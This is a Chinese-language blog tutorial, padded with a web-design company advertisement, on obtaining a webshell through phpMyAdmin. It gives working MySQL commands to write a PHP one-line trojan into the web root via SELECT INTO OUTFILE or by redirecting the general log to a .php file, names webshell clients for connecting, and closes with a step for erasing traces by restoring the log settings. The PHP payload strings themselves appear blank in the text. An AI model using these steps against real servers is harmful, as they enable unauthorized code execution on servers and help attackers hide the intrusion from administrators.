phpmyadmin中怎么获取shell

本篇文章给大家分享的是有关phpmyadmin中怎么获取shell，小编觉得挺实用的，因此分享给大家学习，希望大家阅读完这篇文章后可以有所收获，话不多说，跟着小编一起来看看吧。

成都网站建设哪家好，找创新互联！专注于网页设计、重庆网站建设、微信开发、小程序开发、集团成都企业网站定制等服务项目。核心团队均拥有互联网行业多年经验，服务众多知名企业客户；涵盖的客户类型包括：花箱等众多领域，积累了大量丰富的经验，同时也获得了客户的一致赞美！

一、select into outfile直接写入

1、利用条件

对web目录需要有写权限能够使用单引号(root)

知道网站绝对路径(phpinfo/php探针/通过报错等)

secure_file_priv没有具体值

2、查看secure_file_priv值

show global variables like '%secure%';

关于secure_file_priv配置介绍：

secure_file_priv 是用来限制 load dumpfile、into outfile、load_file() 函数在哪个目录下拥有上传或者读取文件的权限

当 secure_file_priv 的值为 NULL ，表示限制 MySQLd 不允许导入|导出，此时无法提权
当 secure_file_priv 的值为 /tmp/ ，表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下，此时也无法提权
当 secure_file_priv 的值没有具体值时，表示不对 mysqld 的导入|导出做限制，此时可提权

我这里的secure_file_priv值为NULL，所以不能够导入或导出

secure_file_priv这个值是只读变量，只能通过配置文件修改。如果管理员没有配置，那么我们是无法进行写入shell的，这里我为了测试能否写入修改一下

在MySQL的配置文件my.ini中进行配置：

修改后secure_file_priv的值如图所示：

3、写入一句话

select '' INTO OUTFILE 'D:\\phpStudy\\PHPTutorial\\WWW\\a.php'

这里需要注意的一个点是路径需要用"\\"

查看下根目录

二、利用全局日志写shell

1、查看配置

查看mysql的日志状态，默认是关闭的，因为这个日志的量非常大对资源是一个比较大的开销

SHOW VARIABLES LIKE '%general%'

general_log_file为日志保存的位置

2、开启general_log模式

开启general_log 的作用：开启它可以记录用户输入的每条命令，会把其保存在C:\phpStudy\MySQL\data\stu1.log的文件中，其实就是我们常说的日志文件利用思路：开启general_log之后把general_log_file的值修改为该网站默认路径下的某一个自定义的php文件中，然后通过log日志进行写入一句话木马，然后再进一步利用

这里注意：在修改log路径前，源路径一定要提前记录下来，我们获取shell后还要恢复原来的路径

set global general_log = on;

再查看一下日志已经开启，这时我们就可以通过全局日志写shell进根目录

3、修改日志目录为shell地址

set global general_log_file='C:\\phpStudy\\MySQL\\data\\shell.php';

4、写入shell

因为开启了日志记录功能，所执行的sql语句都会被记录在日志中

select ''

查看下日志，发现sql语句已经被记录到了日志中，直接用菜刀或者蚁剑连接即可

5、抹除痕迹

set global general_log_file='C:\\phpStudy\\MySQL\\data\\stu1.log';
set global general_log = off;

再使用日志查看命令发现已经恢复

SHOW VARIABLES LIKE '%general%'

以上就是phpmyadmin中怎么获取shell，小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注创新互联行业资讯频道。